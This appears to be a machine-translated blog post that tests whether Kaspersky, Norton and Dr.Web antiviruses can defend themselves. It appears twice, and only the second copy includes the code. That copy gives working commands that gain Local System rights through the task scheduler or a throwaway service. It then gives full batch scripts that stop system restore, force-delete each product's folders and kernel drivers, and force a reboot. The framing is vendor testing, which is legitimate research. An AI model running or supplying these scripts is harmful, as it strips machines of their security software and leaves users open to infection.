Antivirus self-defense or cut antivirus without a knife
Hello to all!
Recently, we have already discussed the power of the heuristic technologies of modern antiviruses and came to the conclusion that no one can believe. Even sometimes myself :)
Today we will talk about another controversial moment of anti-virus - self-defense. Some vendors are very serious about this moment, and their products stand up even in complex complex cases of active infection, effectively removing viral intercepts, installing into the system and even subsequently deleting maliciously registered malware. Others believe that active infection is a battle with windmills, which does not lead to anything worthwhile, and therefore - LiveCD, and in some cases format c:
')
Let us pay tribute to both opponents: of course, if there is an opportunity to defeat a viral confrontation, this is good. Unless this leads to bsodam and boot the system for a couple of days. And it is absolutely obvious that with serious and complex infection it is often impossible to break through the active mass of interceptions, malicious processes at the kernel level and others - and therefore it is often more reasonable to treat the inactive system (with a LiveCD or scanning the hard drive on an uninfected machine), but in case of bitty file infection - and think about the complete reinstallation of the OS.
But let's not indulge in disputes - let's leave it for the next article :) Let's talk about a simple one: about self-defense of the system even on a deliberately uninfected system. And take a priori:
1) there is a complex product antivirus + hips + firewall;
2) the system was not infected, but the malicious code somehow penetrated;
3) the malicious code has the intention to remove the antivirus or damage it so as to ensure complete inoperability.
The option of actions will be the simplest - an attempt to delete vital antivirus files with Local System rights. The idea of this approach belongs to my good friend Alexey Baranov, who reported about it in closed circles some time ago. The time has passed, we will assume that the vendors have tightened up - check it out.
On Windows-based systems, working as an administrator (and this is probably 80% of all systems), getting the Local System rights is quite simple. Immediately comes to mind two ways, well described in the network.
Method 1. Using the scheduler.
By default, the task scheduler service runs on all Windows systems. This service runs the task with the required Local System rights. Then it's very easy to add a task somehow:
and kill.bat will run as Local System.
The advantages are obvious: everything is simple and clear. Disadvantage: the user may notice a strange new task in the scheduler, and just for security reasons, disable this service.
Method 1. Creating a service.
The essence of the method is to create a service, start it and delete it. In this case, everything is implemented in three lines:
At the same time, not only will killer.bat run with IDLE priority, it will also run on behalf of the Local System.
The method is invisible, does not manifest itself.
At the time of publication of the KIS 2010 article, both methods skipped at the hips level, without even asking for any permissions.
Now let's move on to killer.bat itself (in our case, it is located at the root of drive C, but it is clear that you can throw it anywhere).
The essence of this file is simple: delete everything that belongs to the antivirus. So, for Kaspersky 2010 it will be:
For Symantec, something like (who knows more precisely - correct, I myself am on Kaspersky):
For Doctor Web:
Well, and so on. In the first line there is a stop of the Windows recovery service - just in case :)
It is clear that a similar script can be prescribed for all antiviruses - the essence of changing the paths to vital files.
Total - what do we have?
1. KIS 2010 received such damage that it was killed and the system was left without protection. KIS 2011 is devoid of this sexual weakness - but it's still beta ...
2. NIS lost several files, but the performance did not fail, the files were subsequently downloaded and restored when upgrading from the Internet.
3. DrWeb did not suffer at all, as expected, taking into account the special emphasis of the developer on the opposition of the infection. But do not forget that there is SpiDie for the Web ...
At the same time, the hipsa of the above products quietly missed both variants of the manipulations (IK checked personally).
FINDINGS
Unfortunately, we have to admit the fact that some of the existing antivirus solutions have a number of vulnerabilities that can be used to damage the protection and actually remove the antivirus from the computer.
It is proposed in the comments to supplement the observations and research on other anti-virus products (preferably with heaps, in order to assess the level of blocking actions for obtaining Local System rights). I think that the described manipulations are clear and can be easily reproduced on virtual machines of enthusiasts.
Cheers!
Recently, we have already discussed the power of the heuristic technologies of modern antiviruses and came to the conclusion that no one can believe. Even sometimes myself :)
Today we will talk about another controversial moment of anti-virus - self-defense. Some vendors are very serious about this moment, and their products stand up even in complex complex cases of active infection, effectively removing viral intercepts, installing into the system and even subsequently deleting maliciously registered malware. Others believe that active infection is a battle with windmills, which does not lead to anything worthwhile, and therefore - LiveCD, and in some cases format c:
')
Let us pay tribute to both opponents: of course, if there is an opportunity to defeat a viral confrontation, this is good. Unless this leads to bsodam and boot the system for a couple of days. And it is absolutely obvious that with serious and complex infection it is often impossible to break through the active mass of interceptions, malicious processes at the kernel level and others - and therefore it is often more reasonable to treat the inactive system (with a LiveCD or scanning the hard drive on an uninfected machine), but in case of bitty file infection - and think about the complete reinstallation of the OS.
But let's not indulge in disputes - let's leave it for the next article :) Let's talk about a simple one: about self-defense of the system even on a deliberately uninfected system. And take a priori:
1) there is a complex product antivirus + hips + firewall;
2) the system was not infected, but the malicious code somehow penetrated;
3) the malicious code has the intention to remove the antivirus or damage it so as to ensure complete inoperability.
The option of actions will be the simplest - an attempt to delete vital antivirus files with Local System rights. The idea of this approach belongs to my good friend Alexey Baranov, who reported about it in closed circles some time ago. The time has passed, we will assume that the vendors have tightened up - check it out.
On Windows-based systems, working as an administrator (and this is probably 80% of all systems), getting the Local System rights is quite simple. Immediately comes to mind two ways, well described in the network.
Method 1. Using the scheduler.
By default, the task scheduler service runs on all Windows systems. This service runs the task with the required Local System rights. Then it's very easy to add a task somehow:
at 11:05 c:\killer.batand kill.bat will run as Local System.
The advantages are obvious: everything is simple and clear. Disadvantage: the user may notice a strange new task in the scheduler, and just for security reasons, disable this service.
Method 1. Creating a service.
The essence of the method is to create a service, start it and delete it. In this case, everything is implemented in three lines:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystemAt the same time, not only will killer.bat run with IDLE priority, it will also run on behalf of the Local System.
The method is invisible, does not manifest itself.
At the time of publication of the KIS 2010 article, both methods skipped at the hips level, without even asking for any permissions.
Now let's move on to killer.bat itself (in our case, it is located at the root of drive C, but it is clear that you can throw it anywhere).
The essence of this file is simple: delete everything that belongs to the antivirus. So, for Kaspersky 2010 it will be:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
shutdown -r -f -c "Bye-Bye!!!"For Symantec, something like (who knows more precisely - correct, I myself am on Kaspersky):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye!!!"For Doctor Web:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"Well, and so on. In the first line there is a stop of the Windows recovery service - just in case :)
It is clear that a similar script can be prescribed for all antiviruses - the essence of changing the paths to vital files.
Total - what do we have?
1. KIS 2010 received such damage that it was killed and the system was left without protection. KIS 2011 is devoid of this sexual weakness - but it's still beta ...
2. NIS lost several files, but the performance did not fail, the files were subsequently downloaded and restored when upgrading from the Internet.
3. DrWeb did not suffer at all, as expected, taking into account the special emphasis of the developer on the opposition of the infection. But do not forget that there is SpiDie for the Web ...
At the same time, the hipsa of the above products quietly missed both variants of the manipulations (IK checked personally).
FINDINGS
Unfortunately, we have to admit the fact that some of the existing antivirus solutions have a number of vulnerabilities that can be used to damage the protection and actually remove the antivirus from the computer.
It is proposed in the comments to supplement the observations and research on other anti-virus products (preferably with heaps, in order to assess the level of blocking actions for obtaining Local System rights). I think that the described manipulations are clear and can be easily reproduced on virtual machines of enthusiasts.
Cheers!
Source: https://habr.com/ru/post/98322/
All Articles